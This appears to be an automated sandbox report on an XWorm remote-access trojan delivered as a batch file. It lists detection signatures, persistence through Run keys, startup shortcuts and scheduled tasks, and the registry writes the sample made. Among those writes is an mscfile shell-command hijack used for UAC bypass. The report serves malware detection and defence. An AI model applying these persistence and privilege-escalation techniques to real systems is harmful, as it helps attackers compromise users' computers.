Malware Analysis Report

2024-10-16 05:07

Sample ID 240727-29neqsxcmh
Target Uac Bypass Rat.bat
SHA256 a5414f82d063d24e7f0d7e417024ba796c6e52fcb07cd8e59c306fe0e05b7518
Tags
xworm defense_evasion discovery dropper evasion execution persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a5414f82d063d24e7f0d7e417024ba796c6e52fcb07cd8e59c306fe0e05b7518

Threat Level: Known bad

The file Uac Bypass Rat.bat was found to be: Known bad.

Malicious Activity Summary

xworm defense_evasion discovery dropper evasion execution persistence rat trojan

Xworm

Detect Xworm Payload

Disables Task Manager via registry modification

Disables RegEdit via registry modification

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Disables use of System Restore points

Download via BitsAdmin

Drops startup file

Executes dropped EXE

Looks up external IP address via web service

Obfuscated Files or Information: Command Obfuscation

Deobfuscate/Decode Files or Information

Adds Run key to start application

Drops file in System32 directory

Drops file in Windows directory

Launches sc.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Modifies registry key

Suspicious use of WriteProcessMemory

Modifies registry class

Scheduled Task/Job: Scheduled Task

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: LoadsDriver

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-27 23:17

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-27 23:17

Reported

2024-07-27 23:27

Platform

win10-20240611-en

Max time kernel

563s

Max time network

602s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uac Bypass Rat.bat"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\SysWOW64\reg.exe N/A

Disables Task Manager via registry modification

evasion

Disables use of System Restore points

evasion

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\system32\bitsadmin.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uni.lnk C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uni.lnk C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000\Software\Microsoft\Windows\CurrentVersion\Run\Uni = "C:\\Users\\Admin\\Uni.exe" C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A

Deobfuscate/Decode Files or Information

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\certutil.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\Recovery C:\Windows\SysWOW64\ReAgentc.exe N/A
File opened for modification C:\Windows\SysWOW64\Recovery\ReAgent.xml C:\Windows\SysWOW64\ReAgentc.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log C:\Windows\SysWOW64\ReAgentc.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log C:\Windows\SysWOW64\ReAgentc.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml C:\Windows\SysWOW64\ReAgentc.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml C:\Windows\SysWOW64\ReAgentc.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\cknnzt.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\ReAgentc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\mscfile\shell C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\mscfile\shell\open\command\ = "cmd.exe /c reg delete HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /f & C:\\Windows\\System32\\cmd.exe" C:\Windows\system32\reg.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\mscfile\shell\open\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257" C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\mscfile C:\Windows\system32\reg.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\mscfile\shell\open C:\Windows\system32\reg.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
